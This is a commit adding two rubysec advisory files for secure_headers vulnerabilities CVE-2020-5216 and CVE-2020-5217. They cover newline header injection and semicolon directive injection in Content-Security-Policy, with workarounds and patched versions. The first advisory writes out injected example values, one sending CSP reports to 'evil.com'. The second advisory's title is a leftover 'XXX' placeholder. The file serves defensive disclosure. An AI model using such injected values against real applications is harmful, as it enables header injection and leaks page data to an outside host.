Add CVE-2020-5216 and CVE-2020-5217 for secure_headers

rubysec · Jan 29, 2020 · d7f1839 · thomas-mcdonald · Jan 29, 2020 · reedloden
1 parent 1ea1630
commit d7f1839
Show file tree

Hide file tree

Showing 2 changed files with 94 additions and 0 deletions.
diff --git a/gems/secure_headers/CVE-2020-5216.yml b/gems/secure_headers/CVE-2020-5216.yml
@@ -0,0 +1,52 @@
+---
+gem: secure_headers
+cve: 2020-5216
+ghsa: w978-rmpf-qmwg
+url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
+date: 2020-01-23
+title: secure_headers header injection due to newline
+description: |-
+  If user-supplied input was passed into append/override_content_security_policy_directives,
+  a newline could be injected leading to limited header injection.
+
+  Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
+  header with the remaining value of the original string. It will continue to create new headers
+  for each newline.
+
+  e.g.
+
+  ```
+  override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
+  ```
+
+  would result in
+
+  ```
+  Content-Security-Policy: ... script-src: mycdn.com
+  Content-Security-Policy: injected
+  Content-Security-Policy: rest-of-the-header
+  ```
+
+  CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
+
+  ```
+  override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
+  ```
+
+  ```
+  Content-Security-Policy: ... script-src: mycdn.com
+  Content-Security-Policy: default-src 'none'; report-uri evil.com
+  Content-Security-Policy: rest-of-the-header
+  ```
+
+  Workarounds
+  ```
+  override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
+  ```
+
+cvss_v3: 4.4
+
+patched_versions:
+  - "~> 3.9.0"
+  - "~> 5.2.0"
+  - ">= 6.3.0"
diff --git a/gems/secure_headers/CVE-2020-5217.yml b/gems/secure_headers/CVE-2020-5217.yml
@@ -0,0 +1,42 @@
+---
+gem: secure_headers
+cve: 2020-5217
+ghsa: xq52-rv6w-397c
+url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
+date: 2020-01-23
+title: secure_headers XXX
+description: |-
+  If user-supplied input was passed into append/override_content_security_policy_directives,
+  a semicolon could be injected leading to directive injection.
+
+  This could be used to e.g. override a script-src directive. Duplicate directives are ignored
+  and the first one wins. The directives in secure_headers are sorted alphabetically so they
+  pretty much all come before script-src. A previously undefined directive would receive a value
+  even if SecureHeaders::OPT_OUT was supplied.
+
+  The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
+  when this happens. This will result in innocuous browser console messages if being
+  exploited/accidentally used. In future releases, we will raise application errors resulting in
+  500s.
+
+  > Duplicate script-src directives detected. All but the first instance will be ignored.
+
+  See https://www.w3.org/TR/CSP3/#parse-serialized-policy
+
+  > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
+  > ignored. A console warning might be appropriate, for example.
+
+  # Workarounds
+
+  If you are passing user input into the above methods, you could filter out the input:
+
+  ```
+  override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
+  ```
+
+cvss_v3: 4.4
+
+patched_versions:
+  - "~> 3.8.0"
+  - "~> 5.1.0"
+  - ">= 6.2.0"